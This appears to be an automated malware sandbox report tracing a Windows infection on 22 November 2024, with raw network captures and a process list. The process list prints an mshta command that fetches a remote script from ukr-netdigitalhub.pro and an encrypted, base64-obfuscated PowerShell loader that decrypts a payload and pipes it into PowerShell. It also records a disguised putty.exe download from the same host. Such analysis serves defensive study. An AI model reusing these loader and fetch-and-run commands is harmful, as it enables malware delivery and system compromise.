72 65 6e 74 20 32 20 30 20 52 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 46 6f 6e 74 3c 3c 2f 46 31 20 35 20 30 20 52 3e 3e 2f 45 78 74 47 53 74 61 74 65 3c 3c 2f 47 53 37 20 37 20 30 20 52 2f 47 53 38 20 38 20 30 20 52 3e 3e 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 2f 54 65 78 74 2f 49 6d 61 67 65 42 2f 49 6d 61 67 65 43 2f 49 6d 61 67 65 49 5d 20 3e 3e 2f 4d 65 64 69 61 42 6f 78 5b 20 30 20 30 20 35 [TRUNCATED] Data Ascii: %PDF-1.5%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(ru-RU) /StructTreeRoot 10 0 R/MarkInfo<</Marked true>>>>endobj2 0 obj<</Type/Pages/Count 1/Kids[ 3 0 R] >>endobj3 0 obj<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>endobj4 0 obj<</Filter/FlateDecode/Length 134>>streamx-=@DS}[")RS)Qviv/&gblRL%xLma;^U1:<TG1(i`z=<13endstreamendobj5 0 obj<</Type/Font/Subtype/TrueType/Name/F1/BaseFont/ABCDEE+Calibri/Encoding/WinAnsiEncoding/FontDescriptor 6 0 R/FirstChar 32/LastChar 32/Widths 17 0 R>>endobj6 0 obj<</Type/FontDescriptor/FontName/ABCDEE+Calibri/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 75
Nov 22, 2024 14:17:34.042265892 CET	1236	IN	Data Raw: 30 2f 41 76 67 57 69 64 74 68 20 35 32 31 2f 4d 61 78 57 69 64 74 68 20 31 37 34 33 2f 46 6f 6e 74 57 65 69 67 68 74 20 34 30 30 2f 58 48 65 69 67 68 74 20 32 35 30 2f 53 74 65 6d 56 20 35 32 2f 46 6f 6e 74 42 42 6f 78 5b 20 2d 35 30 33 20 2d 32 Data Ascii: 0/AvgWidth 521/MaxWidth 1743/FontWeight 400/XHeight 250/StemV 52/FontBBox[ -503 -250 1240 750] /FontFile2 18 0 R>>endobj7 0 obj<</Type/ExtGState/BM/Normal/ca 1>>endobj8 0 obj<</Type/ExtGState/BM/Normal/CA 1>>endobj9 0 obj<</A
Nov 22, 2024 14:17:34.042335987 CET	1236	IN	Data Raw: ed 37 23 7f 70 13 1c b6 3b 33 f6 23 8d fe b2 ec a6 c5 ad 6b 46 8c 33 1e c0 b3 c6 30 b6 e8 8e 93 1b 96 2f e1 3d f9 26 c6 3e 13 fd 71 37 2f ad ab cd af ef 7d 33 63 f7 5e 88 ea 33 17 d7 ae 69 e9 67 ce 79 13 f5 9f 42 be 6f 71 43 6b ed d5 67 6c 5b c5 Data Ascii: 7#p;3#kF30/=&>q7/}3c^3igyBoqCkgl[+g.]po3G+ZhM_(i21[:~},g>vjK40231omi-u;1fkLLLd0SzEQt
Nov 22, 2024 14:17:34.042376041 CET	1236	IN	Data Raw: 22 bd df c7 e3 fc da 13 b5 5a 18 db 71 a5 65 61 31 72 63 8e c9 57 a5 78 d4 6a b1 5a 70 f8 2a f1 11 18 35 1c 19 0e 2c 97 96 14 2b 3a 6a b8 af 8a 7b 98 2c 86 a7 c4 4a 08 75 4c 3b 48 a8 39 65 63 44 96 2a aa 96 8d f1 f8 ab fd 64 3f d3 25 4f ac 4f fa Data Ascii: "Zqea1rcWxjZp5,+:j{,JuL;H9ecDd?%OO[[8]C}:xLXc~*b.bFX12KOA3KaS\|U@u{(4JMOUvl8&E0?eB)zjZHrqcev@9b+{:&eVG&_3o
Nov 22, 2024 14:17:34.042428017 CET	1236	IN	Data Raw: b9 c6 9c a3 1e ed 7b 69 90 0a 9b b4 56 d1 b3 69 55 91 29 b2 88 76 9e 84 58 16 8c 28 a9 c5 c8 14 83 e7 d3 66 55 c9 38 a5 8a ec b1 98 de 10 76 95 47 d4 f6 45 94 19 55 b1 e5 d1 ea 8f 15 55 3d 72 c1 a8 1a 3c da 3b 24 76 be 8e bc 6d e4 7b 68 8e 07 73 Data Ascii: {iViU)vX(fU8vGEUU=r<;$vm{hs~'X1*OVo5W/_~A,tGT=pg'%,Y+VR@!&O9sgn)NM z)Iqk8E5Rb+hbhbKX,
Nov 22, 2024 14:17:34.042478085 CET	1236	IN	Data Raw: a8 37 51 1e 51 2f 6a 3a 97 28 87 da cc 26 0a 10 f5 a4 a6 fd 44 3e aa e7 25 ca 22 ca 24 ca 20 f2 10 a5 47 d3 27 81 d2 88 dc d1 f4 c9 a0 54 a2 14 72 ba 88 92 c9 d9 83 28 89 c8 49 79 0e 22 3b 39 13 89 6c 44 56 ca b3 10 99 89 12 28 cf 44 64 24 32 44 Data Ascii: 7QQ/j:(&D>%"$ G'Tr(Iy";9lDV(Dd$2D JNRikE!J$@BQ7Qt)5WD_Rh?g)D$RRh\|wDoEEDGSOMzrLD/P9g!z
Nov 22, 2024 14:17:34.042514086 CET	1236	IN	Data Raw: c3 6c f9 94 e5 6d cb 23 cb 75 c3 22 cb df 5f ae b0 e5 dc dc d9 f5 c8 8e e5 9e ac 4a 70 68 dd 72 9b a3 72 59 78 69 b8 65 fb d2 f0 92 c6 c5 e1 93 d0 c1 45 c5 0b c3 4d db 17 86 1b 8b eb c3 0d db eb c3 75 c5 0b c2 b5 c5 35 e1 f9 c5 73 c3 f3 b6 cf 0d Data Ascii: lm#u"_JphrrYxieEMu5s)}V*\|",o^<5<mIIO,}\|x\c+<pd2Ty}D<x${7]mOe.HSJo=RHWR)%2qFz
Nov 22, 2024 14:17:34.042548895 CET	1236	IN	Data Raw: 3f fa 27 30 dd ed f0 29 fa c5 cc aa de c7 0c ac 07 63 5d 07 ba f6 1f be 05 e8 d4 27 76 f3 5c 82 54 0f 9d ef a8 a7 cb d1 f5 f9 71 be cf 0f 5f d2 e5 38 dc 69 48 62 66 ad ae 4d 79 09 de 3f f3 43 5d 07 f0 ca 45 ba 6b b0 48 2b 9b a1 ed 5a 8d af 8c d7 Data Ascii: ?'0)c]'v\Tq_8iHbfMy?C]EkH+ZT6fs\Vj1zafNfl1[ o!>R/>Zj)kVWXJ-+j\|aT}<VK6234%<,fv6;gSQ\v\|vO-.EbKerv%5l
Nov 22, 2024 14:17:34.042582989 CET	1224	IN	Data Raw: ba 92 1c 4a 48 70 ff 90 58 ef f9 41 bf 90 95 ee 2f c5 6e 8e 6d 61 6b a2 fb 87 e6 c4 7a bd e7 87 66 64 61 b3 96 6a 5b 54 0c 2c d0 33 57 1b 98 1f a3 31 16 f6 83 c3 29 76 a8 7a 70 6c fb 53 5b 7e 4c ce ce 4e e6 ce f6 47 37 96 47 f2 c2 9b 9b 2f ba b0 Data Ascii: JHpXA/nmakzfdaj[T,3W1)vzplS[~LNG7G/qSu_{Ffg>ay\|@oo:o@Iw;{;yW(,RN>?fg69Mr9bK*)q,)C_\f0?-o0su<U1M2}X:>
Nov 22, 2024 14:17:34.042618036 CET	1236	IN	Data Raw: 54 a6 70 73 d7 77 fc 77 fa 79 b8 43 f6 66 39 62 1c f7 e8 73 3c 13 1d 95 e8 f8 3b 7b d1 df 7b f5 39 21 2d 8d 8e a6 bf b3 b7 5b 37 8b d4 dc d8 b4 f7 38 fe 7e f5 a0 51 dc 6f 32 92 8c 4e 6e 72 05 32 3c 01 97 29 31 21 2d cf eb ed ed c6 8b b4 b7 d7 9b Data Ascii: TpswwyCf9bs<;{{9!-[78~Qo2Nnr2<)1!-WbWYMnkUo:?,\|wwk=,rR\|kqA1tGnenT/3=))H\(T\|(]VY}Wff^>6*W
Nov 22, 2024 14:17:34.162733078 CET	1236	IN	Data Raw: fe 50 e4 93 94 b8 f8 88 9e 0a cc 46 19 f1 3d 3b 29 3e 73 9c c8 4b 60 ce 2a 16 79 19 cc f6 3e 91 37 80 dd 7e 87 c8 1b a3 64 4c 60 b5 7f 4d e4 e3 a2 ca cd 30 dd fe 0d 91 8f 87 8c cc 89 22 9f 00 29 f6 63 22 6f 91 9a 86 e4 13 e1 2a fb 29 91 b7 42 46 Data Ascii: PF=;)>sK`y>7~dL`M0")c"o)BFHO2D^+Q1K3DyQ2<U<<<kEPaL !!egwXI9x1eBQz)%smXhF+,rl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49750	94.156.177.166	80	1836	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 14:17:42.179107904 CET	56	OUT	GET /putty.exe HTTP/1.1 Host: ukr-netdigitalhub.pro
Nov 22, 2024 14:17:43.572689056 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 13:17:43 GMT Server: Apache/2.4.59 (Debian) Last-Modified: Fri, 15 Nov 2024 20:18:58 GMT ETag: "196120-626f946df1440" Accept-Ranges: bytes Content-Length: 1663264 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 bf 1a 11 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 82 0e 00 00 84 0a 00 00 00 00 00 04 af 0b 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 19 00 00 04 00 00 71 20 1a 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 48 12 00 b4 00 00 00 00 e0 13 00 40 ab 05 00 00 10 13 00 38 6d 00 00 00 0a 19 00 20 57 00 00 00 90 19 00 d8 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 3d 10 00 28 00 00 00 30 d6 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdf"@q `H@8m W=(0@S.textV `.rdata\@@.dataU@.pdata8mn@@.00cfg8@@.gxfg`*,@@.tls:@_RDATA\<@@.rsrc@>@@.reloc @B
Nov 22, 2024 14:17:43.572751045 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 57 53 48 83 ec 40 48 89 d6 48 89 cf 4c 89 44 24 70 4c 89 4c 24 78 48 8b 05 32 a0 12 00 48 31 e0 48 89 44 24 38 48 8d Data Ascii: VWSH@HHLD$pLL$xH2H1HD$8H\$pH\$0kbHHH\$(HD$ HIIHHL$8H1{H@[_^VHpHH1HD$hH5mHt H=ht:HL$hH19HHp^LI1
Nov 22, 2024 14:17:43.572788000 CET	1236	IN	Data Raw: 48 8b 0d 77 aa 12 00 ba 67 00 00 00 e8 e5 fd 03 00 89 c7 48 8b 0d 64 aa 12 00 ba 59 00 00 00 e8 d2 fd 03 00 89 c5 31 c9 ff 15 10 42 12 00 48 89 c3 48 8d 8c 24 10 01 00 00 ff 15 07 42 12 00 85 c0 0f 84 59 0d 00 00 49 83 ff 12 0f 85 eb 0d 00 00 44 Data Ascii: HwgHdY1BHH$BYID%H$"$AA#=*fD$D%=fD=1!=RuH/81!AA
Nov 22, 2024 14:17:43.572841883 CET	1236	IN	Data Raw: bc 0a 00 00 48 8b 0d 9f a5 12 00 ba 7d 00 00 00 e8 0d f9 03 00 48 8d 0d b6 b0 12 00 48 8d 15 b7 b0 12 00 84 c0 48 0f 45 d1 48 8b 12 4c 89 f1 e8 3e a9 00 00 c6 05 09 b9 12 00 01 83 fe 01 0f 84 76 0c 00 00 e9 22 1d 00 00 45 89 e8 41 c1 e8 10 41 0f Data Ascii: H}HHHEHL>v"EAAH?HjDCD8HL;L>Hr2=HH$ HH$H$
Nov 22, 2024 14:17:43.572876930 CET	1236	IN	Data Raw: d7 b9 06 00 00 00 ff d6 4c 89 e1 48 89 c2 ff d7 48 8d 94 24 10 01 00 00 4c 89 ee 4c 89 e9 ff 15 fa 37 12 00 4c 89 e9 ff 15 79 3a 12 00 31 ed e9 b5 18 00 00 89 f0 83 e0 fb 3d 0a 02 00 00 74 0c 39 35 68 91 12 00 0f 85 89 18 00 00 3d 0a 02 00 00 0f Data Ascii: LHH$LL7Ly:1=t95h=DWQEAAAA#:IAuH N&HfrRRH$t7D$D
Nov 22, 2024 14:17:43.572911024 CET	1236	IN	Data Raw: 0f 84 21 0e 00 00 0a 44 24 58 4d 89 fc 0f 85 14 0e 00 00 80 bc 24 20 01 00 00 00 0f 88 00 0e 00 00 41 bc 2b 00 00 00 41 f7 c5 00 00 00 c0 0f 85 f3 0d 00 00 80 b4 24 a0 01 00 00 01 e9 e6 0d 00 00 31 ff 48 85 ff 48 8d 05 d3 5f 11 00 49 89 f8 4c 0f Data Ascii: !D$XM$ A+A$1HH_ILDHD^HDHMH=~u/HtLHIA14uLK2HH=f$
Nov 22, 2024 14:17:43.572946072 CET	744	IN	Data Raw: 15 59 30 12 00 85 c0 0f 84 40 ff ff ff 48 8d 8c 24 10 01 00 00 ff 15 db 2e 12 00 85 c0 0f 84 aa fe ff ff 80 bc 24 22 01 00 00 00 78 12 44 0f b6 84 24 b5 01 00 00 41 c0 e8 07 e9 91 fe ff ff 41 b0 01 e9 89 fe ff ff 49 83 cf 02 be 03 00 00 00 40 b7 Data Ascii: Y0@H$.$"xD$AAI@1H@=u0H$'.H=?t_H>HtSH$11HtR$(H$H$;$$;$
Nov 22, 2024 14:17:43.573002100 CET	1236	IN	Data Raw: 00 00 89 1d be 9f 12 00 83 fe 01 0f 84 2b 04 00 00 83 fe 03 0f 84 fe 03 00 00 83 fe 02 0f 85 21 04 00 00 48 8b 0d 1c 94 12 00 ba 97 00 00 00 e8 4a e8 03 00 45 31 c0 83 f8 01 41 0f 94 c0 41 83 c0 05 e9 00 04 00 00 40 b7 01 44 89 e9 c1 f9 10 8b 2d Data Ascii: +!HJE1AA@D-)EI+MDA-)I+*t+t.uMHE1AA/A'Hr1AA)E1
Nov 22, 2024 14:17:43.573035955 CET	1236	IN	Data Raw: 40 89 5c 24 28 44 89 64 24 20 44 88 7c 24 38 88 44 24 30 89 f2 41 b9 01 00 00 00 e8 7a 06 01 00 4c 89 f1 ff 15 99 28 12 00 31 ed e9 55 07 00 00 48 8b 0d 1b 80 12 00 31 d2 ff 15 8b 26 12 00 c7 05 01 a3 12 00 00 00 00 00 e9 17 07 00 00 80 3d fa a2 Data Ascii: @\$(Dd$ D\|$8D$0AzL(1UH1&=H>H_DtD9u'H~H;;xtODtHHDxH~L1A&aLE
Nov 22, 2024 14:17:43.573071957 CET	1236	IN	Data Raw: 42 9e 00 00 e9 94 02 00 00 b1 01 e8 e6 3c 00 00 4d 85 ed 0f 85 84 02 00 00 41 b8 20 00 00 00 4c 89 f1 ba 02 01 00 00 45 31 c9 ff 15 5e 23 12 00 e9 68 02 00 00 b1 01 e8 ba 3c 00 00 e9 5c 02 00 00 4c 89 f1 e8 cd 01 02 00 e9 4f 02 00 00 49 8d 8d 00 Data Ascii: B<MA LE1^#h<\LOIIHHIH;'Lt$hHLH<H}HkDHDH;ITHE11H$1HA%$h$f$
Nov 22, 2024 14:17:43.696790934 CET	1236	IN	Data Raw: c0 e9 8d 03 00 00 45 31 c0 48 8b 15 ba 85 12 00 4c 89 f1 e8 ea fb 01 00 c6 05 4b 99 12 00 00 84 c0 0f 84 20 03 00 00 e8 a6 25 00 00 48 8b 0d 97 85 12 00 ba 7a 00 00 00 e8 c5 d9 03 00 31 db 89 44 24 58 83 f8 01 0f 94 c3 48 8b 0d 12 91 12 00 48 8b Data Ascii: E1HLK %Hz1D$XHH=AHALt\|$XuLH/HHHHtHwH[HZL

Target ID:	1
Start time:	08:17:16
Start date:	22/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF\Clas\Applications\msh*e').('PSChildName')http://ukr-netdigitalhub.pro/x64dbg2
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:17:16
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:17:21
Start date:	22/11/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mshta.exe" http://ukr-netdigitalhub.pro/x64dbg2
Imagebase:	0x7ff6fdb20000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:17:24
Start date:	22/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	08:17:27
Start date:	22/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt \| powershell -
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:17:27
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:17:28
Start date:	22/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:50:23
Start date:	22/11/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\x64dbg.pdf"
Imagebase:	0x7ff702560000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	09:50:24
Start date:	22/11/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff6c3ff0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	09:50:24
Start date:	22/11/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1636,i,4196166615236883836,1689769362515970507,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff6c3ff0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	09:50:27
Start date:	22/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	09:50:35
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\putty.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\putty.exe"
Imagebase:	0x7ff6bb280000
File size:	1'663'264 bytes
MD5 hash:	5EFEF6CC9CD24BAEEED71C1107FC32DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Function 0000022E89C70FB1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000003.1411900825.0000022E89C70000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000022E89C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_22e89c70000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: db2085af2aee3e2f084a0cf9c454452586bcedbb220dad64cc54277c58e041c2
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash: 85900204895406B5D82451D50C5E29C50406398150FD548804557D0254D44E02966253

Function 0000022E89C70FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000003.1411900825.0000022E89C70000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000022E89C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_22e89c70000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: db2085af2aee3e2f084a0cf9c454452586bcedbb220dad64cc54277c58e041c2
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash: 85900204895406B5D82451D50C5E29C50406398150FD548804557D0254D44E02966253

Function 0000022E89C70FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000003.1411900825.0000022E89C70000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000022E89C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_22e89c70000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: db2085af2aee3e2f084a0cf9c454452586bcedbb220dad64cc54277c58e041c2
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash: 85900204895406B5D82451D50C5E29C50406398150FD548804557D0254D44E02966253

Analysis Process: powershell.exePID: 8120, Parent PID: 7812COMMON

Executed Functions

Function 00007FFAAAF43AC5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909384838.00007FFAAAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAAF40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffaaaf40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: e02509ed6dc23104a0eea36bae143c16de9a856bb50ebbe67a86bc8e98219f06
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 4F01A77111CB0C8FD748EF0CE051AA9B7E0FB85324F10066DE58AC3651D632E882CB41

Analysis Process: powershell.exePID: 1836, Parent PID: 8120COMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

